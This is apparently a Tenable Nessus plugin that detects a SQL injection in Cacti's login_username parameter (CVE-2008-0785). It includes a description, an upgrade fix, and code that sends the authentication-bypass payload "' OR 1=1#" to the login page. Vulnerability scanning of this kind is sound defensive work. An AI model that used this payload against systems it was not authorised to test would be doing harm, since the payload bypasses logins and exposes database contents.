#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31048);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2008-0785");
  script_bugtraq_id(27749);

  script_name(english:"Cacti login_username Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to manipulate a SQL query");

  desc = "
Synopsis :

The remote web server contains a PHP script that is susceptible to a
SQL injection attack. 

Description :

The remote host is running Cacti, a web-based front-end to RRDTool for
network graphing. 

The version of Cacti installed on the remote host fails to sanitize
user input to the 'login_username' parameter before using it in the
'auth_login.php' script to perform database queries.  Regardless of
PHP's 'magic_quotes_gpc' setting, an attacker may be able to exploit
this issue to manipulate database queries to disclose sensitive
information, bypass authentication, or even attack the underlying
database. 

Note that there are also reportedly several other vulnerabilities
associated with this version of Cacti, although Nessus has not checked
for them. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2008-02/0162.html
http://www.securityfocus.com/archive/1/488013/30/0/threaded
http://forums.cacti.net/about25749.html

Solution :

Upgrade to Cacti 0.8.7b / 0.8.6k or later.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/cacti", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Make sure the script exists.
  url = string(dir, "/index.php/sql.php?action=login");

  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If so...
  if ("<title>Login to Cacti" >< res)
  {
    exploit = string(unixtime(), "' OR 1=1#");
    postdata = string("login_username=", urlencode(str:exploit));

    req = string(
      "POST ", url, " HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
      "Content-Type: application/x-www-form-urlencoded\r\n",
      "Content-Length: ", strlen(postdata), "\r\n",
      "\r\n",
      postdata
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
    if (res == NULL) exit(0);

    # There's a problem if we get a 302 response code.
    headers = res - strstr(res, '\r\n\r\n');
    if (
      egrep(pattern:"^HTTP/[^ ]+ 302 ", string:headers) &&
      egrep(pattern:"^Location: +index\.php", string:headers)
    )
    {
      security_hole(port);
      exit(0);
    }
  }
}
